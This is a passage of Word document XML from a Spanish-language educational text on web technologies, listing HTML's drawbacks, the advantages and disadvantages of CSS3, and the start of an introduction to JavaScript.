    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Lenguaje estático.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La interpretación de cada navegador puede ser diferente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Guarda muchas etiquetas que pueden convertirse en “basura” y dificultan la corrección.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El diseño es más lento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Las etiquetas son muy limitadas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CSS3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61FBFFA5" wp14:editId="1B8B3DE7">
            <wp:extent cx="1457325" cy="2042979"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50" name="Imagen 50" descr="Resultado de imagen para CS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CSS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60926" cy="2048027"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00CE55FF">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00CE55FF">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:t>El nombre hojas de estilo en cascada viene del inglés Cascading Style Sheets, del que toma sus siglas. CSS es un lenguaje usado para definir la presentación de un documento estructurado escrito en HTML o XML (y por extensión en XHTML). El W3C(World Wide Web Consortium) es el encargado de formular la especificación de las hojas de estilo que servirán de estándar para los agentes de usuario o navegadores.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00CE55FF">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:t xml:space="preserve">El CSS sirve para definir la estética de un sitio web en un documento externo y eso mismo permite que modificando ese documento (la hoja CSS) podamos cambiar la estética entera de un sitio web, el mismo sitio web puede variar totalmente de estética cambiando solo la CSS, sin tocar para nada los documentos HTML o jsp o asp que lo componen.   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Calibri" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Ventajas</w:t>
      </w:r>
      <w:r w:rsidR="008C3F34">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="008C3F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Control de la presentación de muchos documentos desde una única hoja de estilo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="008C3F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Control más preciso de la presentación;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="008C3F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Aplicación de diferentes presentaciones a diferentes tipos de medios (pantalla, impresión, etc.);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="008C3F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Numerosas técnicas avanzadas y sofisticadas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="008C3F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Se obtiene un mayor control de la presentación del sitio al poder tener todo el código CSS reunido en uno, lo que facilita su modificación. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="008C3F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Al poder elegir el archivo CSS que deseamos mostrar, puede aumentar la accesibilidad ya que podemos asignarle un código CSS concreto a personas con deficiencias visuales, por ejemplo. Esto lo detecta el navegador web. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="008C3F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Conseguimos hacer mucho más legible el código HTML al tener el código CSS aparte (Siempre que no usemos estilos en línea, claro está). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="008C3F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pueden mostrarse distintas hojas de estilo según el dispositivo que estemos utilizando (versión impresa, versión móvil, leída por un sintetizador de voz…) o dejar que el usuario elija. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="008C3F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Gracias a la técnica CSS Sprites podemos aligerar la carga de nuestro sitio al juntar todas las imágenes en una. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="008C3F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Las novedades de CSS3 nos permiten ahorrarnos tiempo y trabajo al poder seguir varias técnicas (bordes redondeados, sombra en el texto, sombra en las cajas, etc.) sin necesidad de usar un editor gráfico.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C3F34" w:rsidRPr="004C1CB9" w:rsidRDefault="008C3F34" w:rsidP="008C3F34">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Desventajas</w:t>
      </w:r>
      <w:r w:rsidR="008C3F34">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="008C3F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Existen limitaciones que CSS 2.x todavía no permite, por ejemplo, la alineación vertical de capas, las sombras, los bordes redondeados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="008C3F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El uso de las tablas nos permitía crear diseños complejos de forma mucho más sencilla que utilizando CSS, aunque CSS3 está intentando facilitar dicho trabajo. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="008C3F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A veces, dependiendo del navegador (Acid tests), la página que ha sido maquetada con CSS puede verse distinta (Aunque, si hemos seguido los estándares web de forma correcta, el problema es del navegador).  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>JAVASCRIPT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00012875">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47D27C0B" wp14:editId="70ED8384">
            <wp:extent cx="1962150" cy="1962150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51" name="Imagen 51" descr="Resultado de imagen para java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java scrip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62150" cy="1962150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012875" w:rsidRPr="004C1CB9" w:rsidRDefault="00012875" w:rsidP="00012875">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00012875">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:t>JavaScript (JS) es un lenguaje ligero e interpretado, orientado a objetos con  </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:tooltip="https://en.wikipedia.org/wiki/First-class_functions" w:history="1">
        <w:r w:rsidRPr="00012875">
          <w:t>funciones de primera clase</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004C1CB9">
        <w:t>, más conocido como el lenguaje de script para páginas web, pero también </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:anchor="Uses_outside_web_pages" w:tooltip="http://en.wikipedia.org/wiki/JavaScript#Uses_outside_web_pages" w:history="1">
        <w:r w:rsidRPr="00012875">
          <w:t>usado en muchos entornos sin navegador</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004C1CB9">
        <w:t>, tales como   </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidRPr="00012875">
          <w:t>node.js</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004C1CB9">
        <w:t> o </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidRPr="00012875">
          <w:t>Apache CouchDB</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004C1CB9">
        <w:t>. Es un lenguaje script multi-paradigma, </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:tooltip="Prototype-based" w:history="1">
        <w:r w:rsidRPr="00012875">
          <w:t>basado en prototipos</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004C1CB9">
        <w:t>,  dinámico, soporta estilos de programación funcional, orientada a objetos e imperativa. </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:tooltip="JavaScript/Acerca_de_JavaScript" w:history="1">
        <w:r w:rsidRPr="00012875">
          <w:t>Leer más sobre JavaScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004C1CB9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00012875">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:tooltip="JavaScript: JavaScript (JS) is a programming language mostly used to dynamically script webpages on the client side, but it is also often utilized on the server-side, using packages such as Node.js." w:history="1">
        <w:r w:rsidRPr="00012875">
          <w:t>JavaScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004C1CB9">
